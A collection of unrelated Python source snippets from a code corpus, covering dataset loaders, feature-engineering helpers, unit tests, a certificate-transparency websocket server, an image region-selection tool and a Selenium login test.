for rnd,utterance in enumerate(dialog['dialog']):
cur_rnd_utterance.append(self.tokenizer.encode(cur_questions[utterance['question']]))
if rnd != len(dialog['dialog'])-1:
cur_rnd_utterance.append(self.tokenizer.encode(cur_answers[utterance['answer']]))
for answer_option in dialog['dialog'][-1]['answer_options']:
cur_option = cur_rnd_utterance.copy()
cur_option.append(self.tokenizer.encode(cur_answers[answer_option]))
options_all.append(cur_option)
tokens_all = []
mask_all = []
segments_all = []
sep_indices_all = []
hist_len_all = []
for j, option in enumerate(options_all):
option, start_segment = pruneRounds(option, self.params['visdial_tot_rounds'])
print("option: {} {}".format(j, tokens2str(option)))
tokens, segments, sep_indices, mask = encode_input(option, start_segment ,self.CLS,
self.SEP, self.MASK ,max_seq_len=MAX_SEQ_LEN, mask_prob=0)
tokens_all.append(tokens)
mask_all.append(mask)
segments_all.append(segments)
sep_indices_all.append(sep_indices)
hist_len_all.append(torch.LongTensor([len(option)-1]))
tokens_all = torch.cat(tokens_all,0)
mask_all = torch.cat(mask_all,0)
segments_all = torch.cat(segments_all, 0)
sep_indices_all = torch.cat(sep_indices_all, 0)
hist_len_all = torch.cat(hist_len_all,0)
item = {}
item['tokens'] = tokens_all.unsqueeze(0)
item['segments'] = segments_all.unsqueeze(0)
item['sep_indices'] = sep_indices_all.unsqueeze(0)
item['mask'] = mask_all.unsqueeze(0)
item['hist_len'] = hist_len_all.unsqueeze(0)
item['image_id'] = torch.LongTensor([img_id])
item['round_id'] = torch.LongTensor([dialog['round_id']])
# add image features. Expand them to create batch * num_rounds * num options * num bbox * img feats
features, num_boxes, boxes, _ , image_target = self._image_features_reader[img_id]
features, spatials, image_mask, image_target, image_label = encode_image_input(features, num_boxes, boxes, \
image_target, max_regions=self._max_region_num, mask_prob=0)
item['image_feat'] = features
item['image_loc'] = spatials
item['image_mask'] = image_mask
item['image_target'] = image_target
item['image_label'] = image_label
return item |
503847 | import pandas as pd
from sklearn import datasets
iris = datasets.load_iris()
iris_df = pd.DataFrame(iris.data, columns = iris.feature_names)
iris_df.head()
iris_df.describe()
|
503921 | from .worker import Worker
from .queue_manager import QueueManager
from .constants import RETRY_TYPE
from .job_queue import JobQueue
from .exceptions import *
from .scheduling_time import SchedulingTime
|
503931 | import pandas as pd
import numpy as np
import nltk
import multiprocessing
import difflib
import time
import gc
import xgboost as xgb
import category_encoders as ce
import itertools
from collections import Counter
from sklearn.metrics import log_loss
from sklearn.cross_validation import train_test_split
def labelcount_encode(df, cols):
categorical_features = cols
new_df = pd.DataFrame()
for cat_feature in categorical_features:
cat_feature_value_counts = df[cat_feature].value_counts()
value_counts_list = cat_feature_value_counts.index.tolist()
value_counts_range_rev = list(reversed(range(len(cat_feature_value_counts)))) # for ascending ordering
value_counts_range = list(range(len(cat_feature_value_counts))) # for descending ordering
labelcount_dict = dict(zip(value_counts_list, value_counts_range))
new_df['{}_lc_encode'.format(cat_feature)] = df[cat_feature].map(labelcount_dict)
return new_df
def count_encode(df, cols, normalize = False):
categorical_features = cols
new_df = pd.DataFrame()
for i in categorical_features:
new_df['{}_count_encode'.format(i)] = df[i].astype('object').replace(df[i].value_counts())
if normalize:
new_df['{}_count_encode'.format(i)] = new_df['{}_count_encode'.format(i)] / np.max(new_df['{}_count_encode'.format(i)])
return new_df
def bin_numerical(df, cols, step):
numerical_features = cols
new_df = pd.DataFrame()
for i in numerical_features:
try:
feature_range = np.arange(0, np.max(df[i]), step)
new_df['{}_binned'.format(i)] = np.digitize(df[i], feature_range, right=True)
except ValueError:
df[i] = df[i].replace(np.inf, 999)
feature_range = np.arange(0, np.max(df[i]), step)
new_df['{}_binned'.format(i)] = np.digitize(df[i], feature_range, right=True)
return new_df
def add_statistics(df, features_list):
X = pd.DataFrame()
X['sum_row_{}cols'.format(len(features_list))] = df[features_list].sum(axis = 1)
X['mean_row{}cols'.format(len(features_list))] = df[features_list].mean(axis = 1)
X['std_row{}cols'.format(len(features_list))] = df[features_list].std(axis = 1)
X['max_row{}cols'.format(len(features_list))] = np.amax(df[features_list], axis = 1)
print('Statistics of {} columns done.'.format(features_list))
return X
def feature_combinations(df, features_list):
X = pd.DataFrame()
for comb in itertools.combinations(features_list, 2):
feat = comb[0] + "_" + comb[1]
X[feat] = df[comb[0]] * df[comb[1]]
print('Interactions on {} columns done.'.format(features_list))
return X
def group_featbyfeat(df, features_list, transformation):
X = pd.DataFrame()
for i in range(len(features_list) - 1):
X['{}_by_{}_{}_list'.format(features_list[i], features_list[i+1], transformation)] = (df.groupby(features_list[i]))[features_list[i+1]].transform('{}'.format(transformation))
print('Groupings of {} columns done.'.format(features_list))
return X
def feature_comb_grouping(df, features_list, transformation):
X = pd.DataFrame()
for comb in itertools.combinations(features_list, 2):
X['{}_by_{}_{}_combinations'.format(comb[0], comb[1], transformation)] = (df.groupby(comb[0]))[comb[1]].transform('{}'.format(transformation))
print('Interactions on {} columns done.'.format(features_list))
return X
def drop_duplicate_cols(df):
dfc = df.iloc[:5000,:]
dfc = dfc.T.drop_duplicates().T
duplicate_cols = sorted(list(set(df.columns).difference(set(dfc.columns))))
print('Dropping duplicate columns:', duplicate_cols)
df.drop(duplicate_cols, axis = 1, inplace = True)
print('Final shape:', df.shape)
del dfc
gc.collect()
return df
|
503936 | def gamify(self):
'''Will apply reduction changes based on edits on the
the produced .json file in the experiment folder'''
if self.param_object.round_counter == 1:
# create the gamify object
from .GamifyMap import GamifyMap
g = GamifyMap(self)
# keep in scan_object
self._gamify_object = g
# do the first export in the experiment folder
g.export_json()
return self
# for every round check if there are changes
self._gamify_object.import_json()
self = self._gamify_object.run_updates()
self._gamify_object.export_json()
return self
|
503944 | from main import db
from sqlalchemy import Column, Integer, ForeignKey, DateTime
from sqlalchemy.orm import relationship
import datetime
class Follower(db.Model):
# 用户source对用户target的关注
source = Column(
Integer,
ForeignKey("user.id", ondelete="CASCADE"),
primary_key=True,
index=True)
target = Column(
Integer,
ForeignKey("user.id", ondelete="CASCADE"),
primary_key=True,
index=True)
time = Column(DateTime, index=True, default=datetime.datetime.now)
|
503989 | from imagededup.utils import general_utils
"""Run from project root with: python -m pytest -vs tests/test_general_utils.py"""
def test_get_files_to_remove():
from collections import OrderedDict
dict_a = OrderedDict({'1': ['2'], '2': ['1', '3'], '3': ['4'], '4': ['3'], '5': []})
dups_to_remove = general_utils.get_files_to_remove(dict_a)
assert set(dups_to_remove) == set(['2', '4'])
|
504024 | import logging
from django.http import HttpResponse
from openunipay.models import PAY_WAY_ALI
from openunipay.paygateway import unipay
_logger = logging.getLogger('openunipay_ali_pay_notificaiton')
def process_notify(request):
_logger.info('received ali pay notification.body:{}'.format(request.body))
unipay.process_notify(PAY_WAY_ALI, request)
return HttpResponse('success', 'text/plain-text', 200)
|
504033 | import os
import tempfile
import unittest
import logging
from pyidf import ValidationLevel
import pyidf
from pyidf.idf import IDF
from pyidf.zone_airflow import ZoneCrossMixing
log = logging.getLogger(__name__)
class TestZoneCrossMixing(unittest.TestCase):
def setUp(self):
self.fd, self.path = tempfile.mkstemp()
def tearDown(self):
os.remove(self.path)
def test_create_zonecrossmixing(self):
pyidf.validation_level = ValidationLevel.error
obj = ZoneCrossMixing()
# alpha
var_name = "Name"
obj.name = var_name
# object-list
var_zone_name = "object-list|Zone Name"
obj.zone_name = var_zone_name
# object-list
var_schedule_name = "object-list|Schedule Name"
obj.schedule_name = var_schedule_name
# alpha
var_design_flow_rate_calculation_method = "Flow/Zone"
obj.design_flow_rate_calculation_method = var_design_flow_rate_calculation_method
# real
var_design_flow_rate = 0.0
obj.design_flow_rate = var_design_flow_rate
# real
var_flow_rate_per_zone_floor_area = 0.0
obj.flow_rate_per_zone_floor_area = var_flow_rate_per_zone_floor_area
# real
var_flow_rate_per_person = 0.0
obj.flow_rate_per_person = var_flow_rate_per_person
# real
var_air_changes_per_hour = 0.0
obj.air_changes_per_hour = var_air_changes_per_hour
# object-list
var_source_zone_name = "object-list|Source Zone Name"
obj.source_zone_name = var_source_zone_name
# real
var_delta_temperature = 0.0
obj.delta_temperature = var_delta_temperature
# object-list
var_delta_temperature_schedule_name = "object-list|Delta Temperature Schedule Name"
obj.delta_temperature_schedule_name = var_delta_temperature_schedule_name
# object-list
var_minimum_zone_temperature_schedule_name = "object-list|Minimum Zone Temperature Schedule Name"
obj.minimum_zone_temperature_schedule_name = var_minimum_zone_temperature_schedule_name
# object-list
var_maximum_zone_temperature_schedule_name = "object-list|Maximum Zone Temperature Schedule Name"
obj.maximum_zone_temperature_schedule_name = var_maximum_zone_temperature_schedule_name
# object-list
var_minimum_source_zone_temperature_schedule_name = "object-list|Minimum Source Zone Temperature Schedule Name"
obj.minimum_source_zone_temperature_schedule_name = var_minimum_source_zone_temperature_schedule_name
# object-list
var_maximum_source_zone_temperature_schedule_name = "object-list|Maximum Source Zone Temperature Schedule Name"
obj.maximum_source_zone_temperature_schedule_name = var_maximum_source_zone_temperature_schedule_name
# object-list
var_minimum_outdoor_temperature_schedule_name = "object-list|Minimum Outdoor Temperature Schedule Name"
obj.minimum_outdoor_temperature_schedule_name = var_minimum_outdoor_temperature_schedule_name
# object-list
var_maximum_outdoor_temperature_schedule_name = "object-list|Maximum Outdoor Temperature Schedule Name"
obj.maximum_outdoor_temperature_schedule_name = var_maximum_outdoor_temperature_schedule_name
idf = IDF()
idf.add(obj)
idf.save(self.path, check=False)
with open(self.path, mode='r') as f:
for line in f:
log.debug(line.strip())
idf2 = IDF(self.path)
self.assertEqual(idf2.zonecrossmixings[0].name, var_name)
self.assertEqual(idf2.zonecrossmixings[0].zone_name, var_zone_name)
self.assertEqual(idf2.zonecrossmixings[0].schedule_name, var_schedule_name)
self.assertEqual(idf2.zonecrossmixings[0].design_flow_rate_calculation_method, var_design_flow_rate_calculation_method)
self.assertAlmostEqual(idf2.zonecrossmixings[0].design_flow_rate, var_design_flow_rate)
self.assertAlmostEqual(idf2.zonecrossmixings[0].flow_rate_per_zone_floor_area, var_flow_rate_per_zone_floor_area)
self.assertAlmostEqual(idf2.zonecrossmixings[0].flow_rate_per_person, var_flow_rate_per_person)
self.assertAlmostEqual(idf2.zonecrossmixings[0].air_changes_per_hour, var_air_changes_per_hour)
self.assertEqual(idf2.zonecrossmixings[0].source_zone_name, var_source_zone_name)
self.assertAlmostEqual(idf2.zonecrossmixings[0].delta_temperature, var_delta_temperature)
self.assertEqual(idf2.zonecrossmixings[0].delta_temperature_schedule_name, var_delta_temperature_schedule_name)
self.assertEqual(idf2.zonecrossmixings[0].minimum_zone_temperature_schedule_name, var_minimum_zone_temperature_schedule_name)
self.assertEqual(idf2.zonecrossmixings[0].maximum_zone_temperature_schedule_name, var_maximum_zone_temperature_schedule_name)
self.assertEqual(idf2.zonecrossmixings[0].minimum_source_zone_temperature_schedule_name, var_minimum_source_zone_temperature_schedule_name)
self.assertEqual(idf2.zonecrossmixings[0].maximum_source_zone_temperature_schedule_name, var_maximum_source_zone_temperature_schedule_name)
self.assertEqual(idf2.zonecrossmixings[0].minimum_outdoor_temperature_schedule_name, var_minimum_outdoor_temperature_schedule_name)
self.assertEqual(idf2.zonecrossmixings[0].maximum_outdoor_temperature_schedule_name, var_maximum_outdoor_temperature_schedule_name) |
504055 | Follow up for N-Queens problem.
Now, instead outputting board configurations, return the total number of distinct solutions.
class Solution:
# @param {integer} n
# @return {integer}
def totalNQueens(self, n):
if n == 0: return 0
self.result = 0 # Here we should use the global variable, otherwise the result will not change
checklist = [-1 for i in xrange(n)]
self.queen_helper(n, 0, checklist)
return self.result
def check_helper(self, depth, i, checklist):
for k in xrange(depth):
if checklist[k] == i or abs(checklist[k] - i) == abs(depth-k):
return False
return True
def queen_helper(self, n, depth, checklist):
if depth == n:
self.result += 1; return
for i in xrange(n):
if self.check_helper(depth, i, checklist):
checklist[depth] = i
self.queen_helper(n, depth+1, checklist)
|
504064 | import asyncio
import collections
import json
import logging
import os
import time
import ssl
from aiohttp import web
from aiohttp.web_urldispatcher import Response
from aiohttp.web_ws import WebSocketResponse
from certstream.util import pretty_date, get_ip
WebsocketClientInfo = collections.namedtuple(
'WebsocketClientInfo',
['external_ip', 'queue', 'connection_time']
)
STATIC_INDEX = '''
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link href="https://fonts.googleapis.com/css?family=Open+Sans:400,700" rel="stylesheet">
</head>
<body>
<div id="app"></div>
<script type="text/javascript" src="https://storage.googleapis.com/certstream-prod/build.js?v={}"></script></body>
</html>
'''.format(time.time())
class WebServer(object):
def __init__(self, _loop, transparency_watcher):
self.active_sockets = []
self.recently_seen = collections.deque(maxlen=25)
self.stats_url = os.getenv("STATS_URL", 'stats')
self.logger = logging.getLogger('certstream.webserver')
self.loop = _loop
self.watcher = transparency_watcher
self.app = web.Application(loop=self.loop)
self._add_routes()
def run_server(self):
self.mux_stream = asyncio.ensure_future(self.mux_ctl_stream())
self.heartbeat_coro = asyncio.ensure_future(self.ws_heartbeats())
if os.environ.get("NOSSL", False):
ssl_ctx = None
else:
ssl_ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
ssl_ctx.load_cert_chain(certfile=os.getenv("SERVER_CERT", "server.crt"), keyfile=os.getenv("SERVER_KEY", "server.key"))
web.run_app(
self.app,
port=int(os.environ.get('PORT', 8080)),
ssl_context=ssl_ctx
)
def _add_routes(self):
self.app.router.add_get("/latest.json", self.latest_json_handler)
self.app.router.add_get("/example.json", self.example_json_handler)
self.app.router.add_get("/{}".format(self.stats_url), self.stats_handler)
self.app.router.add_get('/', self.root_handler)
self.app.router.add_get('/develop', self.dev_handler)
async def mux_ctl_stream(self):
while True:
cert_data = await self.watcher.stream.get()
data_packet = {
"message_type": "certificate_update",
"data": cert_data
}
self.recently_seen.append(data_packet)
for client in self.active_sockets:
try:
client.queue.put_nowait(data_packet)
except asyncio.QueueFull:
pass
async def dev_handler(self, request):
# If we have a websocket request
if request.headers.get("Upgrade"):
ws = web.WebSocketResponse()
await ws.prepare(request)
try:
for message in self.recently_seen:
message_json = json.dumps(message)
await ws.send_str(message_json)
except asyncio.CancelledError:
print('websocket cancelled')
await ws.close()
return ws
return web.Response(
body=json.dumps(
{
"error": "Please use this url with a websocket client!"
},
indent=4
),
content_type="application/json",
)
async def root_handler(self, request):
resp = WebSocketResponse()
available = resp.can_prepare(request)
if not available:
return Response(body=STATIC_INDEX, content_type="text/html")
await resp.prepare(request)
client_queue = asyncio.Queue(maxsize=500)
client = WebsocketClientInfo(
external_ip=get_ip(request),
queue=client_queue,
connection_time=int(time.time()),
)
try:
self.logger.info('Client {} joined.'.format(client.external_ip))
self.active_sockets.append(client)
while True:
message = await client_queue.get()
message_json = json.dumps(message)
await resp.send_str(message_json)
finally:
self.active_sockets.remove(client)
self.logger.info('Client {} disconnected.'.format(client.external_ip))
async def latest_json_handler(self, _):
return web.Response(
body=json.dumps(
{
"messages": list(self.recently_seen)
},
indent=4
),
headers={"Access-Control-Allow-Origin": "*"},
content_type="application/json",
)
async def example_json_handler(self, _):
if self.recently_seen:
return web.Response(
body=json.dumps(list(self.recently_seen)[0], indent=4),
headers={"Access-Control-Allow-Origin": "*"},
content_type="application/json",
)
else:
return web.Response(
body="{}",
headers={"Access-Control-Allow-Origin": "*"},
content_type="application/json"
)
async def stats_handler(self, _):
clients = {}
for client in self.active_sockets:
client_identifier = "{}-{}".format(client.external_ip, client.connection_time)
clients[client_identifier] = {
"ip_address": client.external_ip,
"conection_time": client.connection_time,
"connection_length": pretty_date(client.connection_time),
"queue_size": client.queue.qsize(),
}
return web.Response(
body=json.dumps({
"connected_client_count": len(self.active_sockets),
"clients": clients
}, indent=4
),
content_type="application/json",
)
async def ws_heartbeats(self):
self.logger.info("Starting WS heartbeat coro...")
while True:
await asyncio.sleep(30)
self.logger.debug("Sending ping...")
timestamp = time.time()
for client in self.active_sockets:
await client.queue.put({
"message_type": "heartbeat",
"timestamp": timestamp
})
if __name__ == "__main__":
from certstream.watcher import TransparencyWatcher
loop = asyncio.get_event_loop()
watcher = TransparencyWatcher(loop)
webserver = WebServer(loop, watcher)
asyncio.ensure_future(asyncio.gather(*watcher.get_tasks()))
webserver.run_server()
|
504085 | import numpy as np
from environments.mujoco.rand_param_envs import gym
from environments.mujoco.rand_param_envs.gym.spaces import prng
class MultiBinary(gym.Space):
def __init__(self, n):
self.n = n
def sample(self):
return prng.np_random.randint(low=0, high=2, size=self.n)
def contains(self, x):
return ((x == 0) | (x == 1)).all()
def to_jsonable(self, sample_n):
return sample_n.tolist()
def from_jsonable(self, sample_n):
return np.array(sample_n)
|
504126 | from PIL import Image
from PIL import ImageDraw
import numpy as np
import matplotlib.pyplot as plt
from Utils import joinPath, saveData, setDir
from PlotTools import plotMyFigureOnAxes
def extractSelectedRegion(selected_data):
img_array = selected_data['image_array']
W_R = int(selected_data['W_R'])
H_R = int(selected_data['H_R'])
# import pdb
# pdb.set_trace()
return np.array([img_array[x[1]-H_R:x[1]+H_R, x[0]-W_R:x[0]+W_R] for x in selected_data['selection']['regions']])
def redrawFromSelectedData(ax, selected_data, circle_R=3):
redraw(ax, Image.fromarray(selected_data['image_array']),
selected_data['selection'],
selected_data['W_R'],
selected_data['H_R'],
circle_R)
def redraw(ax, img, selection, W_R, H_R, circle_R):
"""Redraw image presented in numpy format(img) on Matplotlib Axes(ax)
:ax : Matplotlib axes, where to draw image
:img : Pillow Image Object
:selection: {'regions':[], 'count':int}, regions contain the regions to draw
:W_R : int, half of window width
:H_R : int, half of window height
"""
ax.cla()
img_rgb = img.convert(mode='RGB')
draw = ImageDraw.Draw(img_rgb)
for idx, lb in enumerate(selection['regions']):
if lb[2]==0: # branch
# The box is a 4-tuple defining the left, upper, right, and lower pixel coordinate
draw.rectangle([lb[0]-W_R, lb[1]-H_R, lb[0]+W_R, lb[1]+H_R]
,outline="red")
draw.ellipse([lb[0]-circle_R, lb[1]-circle_R, lb[0]+circle_R, lb[1]+circle_R]
, fill="red", outline=None) # "red"
draw.text((lb[0]-W_R,lb[1]-H_R), '{0}'.format(idx), fill='yellow')
else: # nonbranch
draw.rectangle([lb[0]-W_R, lb[1]-H_R, lb[0]+W_R, lb[1]+H_R]
,outline="green")
draw.ellipse([lb[0]-circle_R, lb[1]-circle_R, lb[0]+circle_R, lb[1]+circle_R]
, fill="green", outline=None) # "green"
draw.text((lb[0]-W_R,lb[1]-H_R), '{0}'.format(idx), fill='yellow')
del draw
plotMyFigureOnAxes(ax, np.asarray(img_rgb))
# im = ax.imshow()
# fig = ax.figure
# fig.subplots_adjust(right=0.8)
# cbar_ax = fig.add_axes([0.85, 0.15, 0.05, 0.7])
# fig.colorbar(im, cax=cbar_ax)
def checkBoxInside(img_size, x, y, box_w, box_h):
'''checkBoxInside: Check whether mouse selected region inside
Args:
img_size (tuple(int,int)): image size (width, height).
x (int): x position of box.
y (int): y position of box.
box_w (int): width of box.
box_h (int): height of box.
Returns:
bool: Whether box is inside this image.
'''
left = x-box_w
right = x+box_w
up = y-box_h
down = y+box_h
return left>=0 and right<=img_size[0] and up>=0 and down<=img_size[1]
def mouseSample(dst_pckl_path, src_dir, img_name, W_R, H_R, circle_R):
"""mouseSample, use mouse to select [2*W_R, 2*H_R] windows in images
:dst_pckl_path : string, destination path to store extracted variables
:src_dir : string, source dir of image
:img_name : string, image name
:W_R : int, half window width
:H_R : int , half window height
:circle_R : int, radiu of circle drawn on image
"""
setDir(dst_pckl_path)
img_path = joinPath(src_dir, img_name)
img = Image.open(img_path)
print('Image size: {}'.format(img.size))
img_size = img.size
img_array = np.asarray(img)
selection = {'regions':[], 'count':0}
# fig_a and fig_b are created differently for each different image
# and it's okay they are load simultaneously
fig_a = plt.figure()
fig_a.clf()
fig_a_ax = fig_a.add_subplot(111)
plotMyFigureOnAxes(fig_a_ax, img_array)
# fig_a_ax.imshow(img_array, cmap='Greys_r')
fig_b = plt.figure()
fig_b.clf()
fig_b_ax = fig_b.add_subplot(111)
cids = []
def onclick(event, selection, W_R, H_R, circle_R):
center_x = int(event.xdata)
center_y = int(event.ydata)
fig_b_ax.cla()
if checkBoxInside(img_size, center_x, center_y, W_R, H_R):
window = img_array[center_y-H_R:center_y+H_R, center_x-W_R:center_x+W_R]
window_img = Image.fromarray(window)
window_arr = np.asarray(window_img)
plotMyFigureOnAxes(fig_b_ax, window_arr)
# fig_b_ax.imshow(window_arr,cmap='Greys_r')
fig_b_ax.text(0,0.4,'img{0}, ({1},{2})'.format(selection['count'], center_x, center_y), color='r')
selection['count'] += 1
selection['regions'].append((center_x, center_y, 0))
redraw(fig_a_ax, img, selection, W_R, H_R, circle_R)
else:
fig_b_ax.text(0,0.4,'The box is outside of image', color='r')
def on_key(event, ax, cids):
if event.key=='ctrl+alt+n':
for cid in cids:
ax.figure.canvas.mpl_disconnect(cid)
# Save data into a pickl file
selected_data = {}
selected_data['selection'] = selection
selected_data['image_array'] = img_array
selected_data['img_name'] = img_name
selected_data['W_R'] = W_R
selected_data['H_R'] = H_R
save_pickl_file_name = '_'.join(img_name.split('.')[:-1]).replace('/', '_')
save_pickl_file_name += '.pckl'
print('saved pickl file name: {}'.format(save_pickl_file_name))
saveData([selected_data], joinPath(dst_pckl_path, save_pickl_file_name))
# Notify
fig_a_ax.text(0,0.4,'Finishe mouse selection', color='r')
# Register event handler
cids.append(fig_a_ax.figure.canvas.mpl_connect('button_press_event', lambda event: onclick(event, selection, W_R, H_R, circle_R)))
cids.append(fig_a_ax.figure.canvas.mpl_connect('key_press_event', lambda event: on_key(event, fig_a_ax, cids)))
|
504129 | from beet import Context, Function
def beet_default(ctx: Context):
message = "potato"
with ctx.generate.draft() as draft:
draft.data["demo:foo"] = Function(["say hello"])
with ctx.generate.draft() as draft:
draft.cache("demo", f"{message=}", zipped=True)
draft.data["demo:message"] = Function([f"say {message}"])
ctx.data.functions["demo:message"].lines *= 2
|
504143 | class Config():
def __init__(self, koji_host, koji_storage_host, arch, result_dir):
self.koji_host = koji_host
self.koji_storage_host = koji_storage_host
self.arch = arch
self.result_dir = result_dir
|
504160 | import pymorph
import numpy as np
def test_cthin():
f = np.arange(16*16).reshape((16,16))%8
g = (f > 2)
f = (f > 3)
t = pymorph.cthin(f,g)
assert not np.any( ~g & t )
|
504171 | from remo.remozilla.models import Bug, Status
def get_last_updated_date():
"""Get last successful Bugzilla sync datetime."""
status, created = Status.objects.get_or_create(pk=1)
return status.last_updated
def set_last_updated_date(date):
"""Set last successful Bugzilla sync datetime."""
status, c = Status.objects.get_or_create(pk=1)
status.last_updated = date
status.save()
return status.last_updated
def get_bugzilla_url(obj):
if not isinstance(obj, Bug):
return ''
url = 'https://bugzilla.mozilla.org/show_bug.cgi?id='
return url + '{0}'.format(obj.bug_id)
|
504184 | from .random_forest_oracle import RandomForestOracle
from .gaussian_process_oracle import GaussianProcessOracle
|
504188 | from datetime import datetime
class csv_utils:
def coalesce_date(date):
return "" if date is None else datetime.strftime(date, '%Y-%m-%d %H:%M:%S')
def coalesce_bool(field):
return "" if field is None else "true" if field is True else "false"
def coalesce_int(num):
return "" if num is None else str(num)
|
504270 | from __future__ import print_function, unicode_literals
import unittest
from selenium.webdriver.common.by import By
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from base import SeleniumBaseTest
import os
print ("[DBG]: Running test from: {0}".format(os.getcwd()))
# Fix the path if we are running with the file's folder as working folder.
# (The actual working folder should be "src")
cur_cwd = os.getcwd()
if cur_cwd.endswith(os.path.sep + "selenium"):
os.chdir(os.path.abspath(os.path.join(os.path.dirname(__file__), "..", "..")))
print ("[DBG]: Running test from: {0}".format(os.getcwd()))
class TestLogin(SeleniumBaseTest):
def __init__(self, *args, **kwargs):
super(TestLogin, self).__init__(*args, **kwargs)
def setUp(self):
super(TestLogin, self).setUp()
def tearDown(self):
super(TestLogin, self).tearDown()
self.driver.get_screenshot_as_file('last_screenshot.png')
def _login(self):
self.driver.get(self.core_server_url)
username = self.driver.find_element_by_id("username")
password = self.driver.find_element_by_id("password")
login = self.driver.find_element_by_id("login")
# Login
username.send_keys("any")
password.send_keys("password")
login.click()
WebDriverWait(self.driver, 10).until(
EC.invisibility_of_element_located((By.CSS_SELECTOR, ".rotating-ball"))
)
def test_login(self):
self._login()
# Verify that we landed in My Experiments
my_exps_h3 = self.driver.find_element_by_css_selector("center h2")
self.assertEqual(my_exps_h3.text, "My Experiments")
# Verify that we have several Experiments in the page
my_exps = self.driver.find_elements_by_css_selector(".lab-block")
self.assertGreater(len(my_exps), 0)
def test_logout(self):
# We need to login first.
self._login()
# Logout
logout = self.driver.find_element_by_id('logout')
logout.click()
# Ensure that we have managed to logout
password = self.driver.find_element_by_id("password")
if __name__ == "__main__":
unittest.main() |